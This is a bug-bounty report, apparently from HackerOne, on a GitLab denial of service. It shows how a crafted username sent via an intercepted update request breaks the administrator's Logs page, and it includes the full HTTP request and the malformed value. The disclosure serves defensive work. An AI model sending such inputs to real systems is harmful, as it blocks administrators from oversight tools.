Denial of Service via "Change username".

HackerOne report #482529 by sql00 on 2019-01-19, assigned to jritchey:

An attacker(normal user) can block access to "/admin/logs" page in Administration panel. In the result of this scenario the Administrator will not be able to open "Logs" page.

Steps To Reproduce:

1. Create normal gitlab user via "Register" page.
2. Go to Settings -> Account -> Change Username
3. Click "Update Username" and intercept the request.
   Request:

PUT /profile/update_username.json HTTP/1.1  
Host: 192.168.1.106  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-Token: fo/jJTRUcYjKV46y1/mYnJzCtTu5otud5El0Y9PW+Wzu7o5dLCtsJ5WMbYLN1DEzFRqxgR2z4H7f6I2r/sliew==  
X-Requested-With: XMLHttpRequest  
Content-Type: application/json;charset=utf-8  
Referer: http://192.168.1.106/profile/account  
Content-Length: 30  
Cookie: _gitlab_session=fa5bbd5f02462cde2814d93489660c3f; sidebar_collapsed=false  
Connection: close

{"user":{"username":"test"}}  

• Change username from "test" to "t�est." and send request. You will receive response "Something went wrong (500)".
• Now, log in Administrator account(ex: root)
• Go to "http:///admin/logs"
• Response from the back-end will be
  "500 Whoops, something went wrong on our end."

Impact

An attacker is able to block access to important Administrative Page.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• dos1.PNG
• dos2.PNG